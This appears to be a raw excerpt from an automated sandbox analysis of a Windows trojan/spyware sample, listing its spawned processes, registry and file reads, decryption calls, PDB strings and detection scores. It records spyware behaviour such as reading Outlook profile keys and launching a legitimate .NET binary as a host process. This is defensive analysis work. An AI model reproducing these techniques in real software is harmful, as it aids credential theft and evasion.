                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 1396
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_02721B000_2_02721B00
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_0272A0900_2_0272A090
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_02723D400_2_02723D40
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_027271C00_2_027271C0
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_027271BC0_2_027271BC
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_027247700_2_02724770
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_0272476B0_2_0272476B
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_0272D5180_2_0272D518
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeCode function: 0_2_02723D0F0_2_02723D0F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0169B7482_2_0169B748
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_01696BE02_2_01696BE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_016B00402_2_016B0040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_016B33F82_2_016B33F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_016B89602_2_016B8960
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_016B0CF02_2_016B0CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_016B00062_2_016B0006
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_018248002_2_01824800
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_018281C02_2_018281C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_018247102_2_01824710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0182D6D02_2_0182D6D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646059E2_2_0646059E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646B2082_2_0646B208
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_06464B882_2_06464B88
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_064699082_2_06469908
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_064676B02_2_064676B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_0646E5882_2_0646E588
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeCode function: 2_2_064653D02_2_064653D0
                      Source: W7UbgU8x18.exeBinary or memory string: OriginalFilename vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameuaAFllYGbTewxRVnYOHBNjJG.exe4 vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000000.261051389.0000000000B7A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000002.301512168.0000000000412000.00000002.00020000.sdmpBinary or memory string: OriginalFilenametuneraidfix.exe8 vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000002.302293725.0000000000B7A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000000.261864579.0000000002860000.00000004.00020000.sdmpBinary or memory string: OriginalFilenamefixedhost.dll0 vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exe, 00000000.00000000.256471113.00000000028DD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenametuneraidfix.exe8 vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exeBinary or memory string: OriginalFilenametuneraidfix.exe8 vs W7UbgU8x18.exe
                      Source: W7UbgU8x18.exeVirustotal: Detection: 35%
                      Source: W7UbgU8x18.exeReversingLabs: Detection: 28%
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeFile read: C:\Users\user\Desktop\W7UbgU8x18.exeJump to behavior
                      Source: W7UbgU8x18.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\W7UbgU8x18.exe "C:\Users\user\Desktop\W7UbgU8x18.exe"
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 1396
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER343.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/7@1/2
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1768:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5644
                      Source: 2.0.aspnet_regbrowsers.exe.400000.3.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 2.0.aspnet_regbrowsers.exe.400000.3.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 2.0.aspnet_regbrowsers.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 2.0.aspnet_regbrowsers.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 2.0.aspnet_regbrowsers.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 2.0.aspnet_regbrowsers.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: W7UbgU8x18.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: W7UbgU8x18.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                      Source: W7UbgU8x18.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb""9s source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000A.00000003.270613865.000000000501B000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270476484.000000000501B000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.283477132.000000000501C000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270318610.0000000003131000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271099127.0000000003131000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270669562.0000000003131000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270533710.000000000501B000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271835064.000000000501B000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270427827.000000000501B000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: tuneraidfix.pdb" source: WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp
                      Source: Binary string: t.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: cfgmgr32.pdb, source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000A.00000003.271728501.0000000003125000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270300201.0000000003125000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: ore.ni.pdb" source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb6 source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: fixedhost.pdb\ source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: clr.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: .ni.pdb source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\exe\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000A.00000003.271474632.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270327702.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270696517.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271114110.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdbT3|n source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\Administrator\Desktop\Builder\stub\1605780553\un_priv\tuneraidfix\obj\Release\tuneraidfix.pdb source: W7UbgU8x18.exe
                      Source: Binary string: fixedhost.pdbMZ@ source: WER343.tmp.dmp.10.dr
                      Source: Binary string: nsi.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Z.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: wsspicli.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb* source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: tuneraidfix.pdb4 source: WER343.tmp.dmp.10.dr
                      Source: Binary string: mscorlib.pdb source: W7UbgU8x18.exe, 00000000.00000000.256471113.00000000028DD000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: C:\Windows\tuneraidfix.pdbpdbfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000A.00000003.285188895.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284978604.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285080721.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000A.00000003.270318610.0000000003131000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271099127.0000000003131000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270669562.0000000003131000.00000004.00000001.sdmp
                      Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER343.tmp.dmp.10.dr
                      Source: Binary string: C:\Users\Administrator\Desktop\Builder\stub\1605780553\un_priv\tuneraidfix\obj\Release\tuneraidfix.pdbP source: W7UbgU8x18.exe, 00000000.00000000.256076792.0000000000C18000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000002.302604429.0000000000C18000.00000004.00000020.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: System.Xml.ni.pdbRSDS source: WER343.tmp.dmp.10.dr
                      Source: Binary string: C:\Users\user\Desktop\W7UbgU8x18.PDB source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: winhttp.pdbW source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: t.pdb" source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: System.Core.ni.pdbRSDSD source: WER343.tmp.dmp.10.dr
                      Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: W7UbgU8x18.PDB source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: t.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
